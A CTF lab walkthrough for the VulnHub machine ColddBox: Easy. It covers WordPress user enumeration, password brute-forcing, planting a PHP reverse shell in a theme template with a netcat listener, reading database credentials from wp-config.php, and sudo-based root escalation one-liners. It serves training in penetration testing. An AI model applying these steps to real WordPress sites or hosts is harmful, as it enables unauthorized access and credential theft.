c0lddbox : Walkthrough 📝

This is a write-up for the VulnHub CTF machine, COLDDBOX: EASY (download here). Recently, I had a project to solve this machine, and here’s how I obtained the two flags. This machine works best with VirtualBox, but I have a secret sauce too at the end to make it work on VMware too ;)

;)

Methodology, I used :

• Reconnaissance
• Scanning
• Enumerating Users
• Uploading Payload
• Gaining Access
• Privilege Escalation

Download the machine from the above link then import the machine from the .ova file and spin up both the attacker (using Kali Linux here) and target machines (i.e. the c0lddbox).

> Reconnaissance
This machine has DHCP service enabled so an IP address should get automatically assigned to it. Here, I did an arp-scan using ‘netdiscover’ tool to find out our target machine’s IP.

Netdiscover is an active/passive address reconnaissance tool, mainly developed for those wireless networks without dhcp server. It can passively detect online hosts, or search for them, by actively sending ARP requests.

Using netdiscover for recon

> Scanning
I followed up with an ‘nmap’ scan with -T4 -p- -A flags for aggressive, all ports and advanced scan options.

Nmap, short for Network Mapper, is a free and open-source tool used for vulnerability checking, port scanning and, of course, network mapping.

Doing nmap scan on our target

The scan results reveals two ports being open on our target :

Port: 80/tcp open | Service: http | Version: Apache httpd 2.4.18 ((Ubuntu))

Port: 4512/tcp open | Service: ssh | Version: OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)

Here we can ssh into our target machine, but we need a valid user to login as, so I landed on the site hosted on port 80 of the target ip.

Website hosted on http://<target_ip>

Clicking the “Log in” option in the left corner under Meta of the above photo, takes us to a wordpress login page. So it has a WordPress CMS (Content Management System) running on it.

WordPress Login Page of victim machine

> Enumerating Users
For enumerating valid credentials, we can use the BurpSuite or Metasploit Framework or WPScan.
I used WPScan here, to find out the usernames first.

WPScan can detect the versions of WordPress core, plugins and themes, Publicly accessible sensitive data. WPScan can check for publicly accessible wp-config. php backups and other database exports.

Executing WPScan for enumerating users

Upon the WPScan execution, 4 users were found. I tried with ‘c0ldd’ first cause it’s obvious as the machine itself is named after the same.

Users found after enumeration

I went for brute-forcing the password of the user c0ldd, using the same tool, WPScan, and in-built rockyou.txt wordlist in Kali.

Executing WPScan for brute-forcing password

Soon a valid password was found for the user c0ldd !
Password: 9876543210

Password found! YAY!

Now that we have a valid credential, I logged in using the same on the WordPress login page, and voila! It took me to the WordPress Admin Dashboard!

WordPress Admin Login using obtained credentials

> Uploading Payload
Now as we can modify any theme templates within ‘Appearance’, so I went ahead to edit the 404.php template to upload our payload i.e. the php-reverse-shell from pentest monkey (link here).

A reverse shell, also known as a remote shell or “connect-back shell”, takes advantage of the target system’s vulnerabilities to initiate a shell session and then access the victim’s computer.

Edited the whole 404.php with the php-reverse-shell payload

Here we need to modify a couple of parameters to successfully listen to the incoming reverse shell connection from our victim.

We need to change the $ip and $port accordingly, so did I. You need to put in there, your attacker machine’s IP and a port to listen to.

Changing $ip & $port parameters accordingly

> Exploiting & Gaining Access
After uploading our payload, we need to stage up our ‘netcat’ or nc listener first to listen to any connect-back shells and trigger our payload by visiting the 404.php page.

netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol.

To setup netcat listener : nc -nlvp 4444

Netcat listening on 4444 port

URL path to the 404.php page :

http://<your_target_ip>/wp-content/themes/twentyfifteen/404.php

As soon as I hit the 404.php page, we’ll get a reverse-shell on our listener.

YaY! Got a reverse-shell

I checked if python3 is installed there or not and found it’s there. So we’ll upgrade the basic shell to spawn a python tty shell using the following command:

python3 -c 'import pty;pty.spawn ("/bin/bash")'

Upgrading to a python tty shell

Now we need to find the WordPress config file as in most scenarios , it contains valid database credentials. And eventually I found out the wp-config.php file in the /var/www/html directory and also a username and password combo in it.

MySQL Database credentials found!

Now at this point, if there’s a password-reuse, we can try ssh-ing into the machine using the credentials and get a successful login or we can just su (switch user) into c0ldd. I logged in using the ssh on port 4512, since ssh was running on the same port & there was password-resuse.

And here, I got the first flag! Let’s go! It’s base64 encoded, so after decoding and translation, we get — “Congratulations, first level achieved!”

Captured the first flag!

Decoding the 1st base64 encoded flag

Translation

> Privilege Escalation
We need to get root access on this machine since there’s one more flag left for the root level user, so here we have to do privilege escalation.

Privilege escalation is the act of exploiting a bug, a design flaw, or a configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. The result is that an application with more privileges than intended by the application developer or system administrator can perform unauthorized actions.

To do so, we need to check what binaries are available to be run as root without the root credentials. I used sudo -l to list out the available binaries that can be used for elevated access to root and do a priv-esc.

Listing available binaries for root access with ‘sudo -l’

Here, we take help from the very popular GTFOBins to privilege-escalate, and can easily escalate those three binaries i.e. vim, chmod & ftp.
I’ll be showing the three methods to escalate the privileges here:

a) Using vim:

sudo vim -c ':!/bin/sh'

Using vim for priv-esc

b) Using chmod:

sudo -u root chmod 6777 /bin/bash
bash -p

Using chmod for priv-esc

c) Using ftp:

sudo ftp
!/bin/bash

Using ftp for priv-esc

And here, I got the second flag! Let’s go! It’s also base64 encoded, so after decoding and translation, we get — “Congratulations, machine completed!”

Decoding the 2nd base64 encoded flag

Translation

So that was the solution for this CTF machine, it was a pretty easy one. I hope you find this write-up useful.

Now it’s time for the secret sauce to make it work on VMware [although this method is a bypass without solving the machine]:
Since, we have the valid credentials of the user ‘c0ldd’, you can directly log into the machine using username: c0ldd & password: cybersecurity.
After this, you need to do privilege escalation using any of the above three methods to get into the root account and execute the “dhclient” command.
This will let the Dynamic Host Configuration Protocol Client fetch and assign an IP address to the c0lddbox itself.

Although I’ve already solved some CTF machines in the past, this is my first write-up on this one. Let me know your thoughts on this!

Cheers!💙
~WhiteFight18

Get in touch🌐:
Github
Twitter

The Gray Area is a collection of great cybersecurity and computer science posts. The best articles are highlighted in a weekly newsletter, sent out every Wednesday. To get updates whenever The Gray Area publishes an article, check out our Twitter page, @TGAonMedium.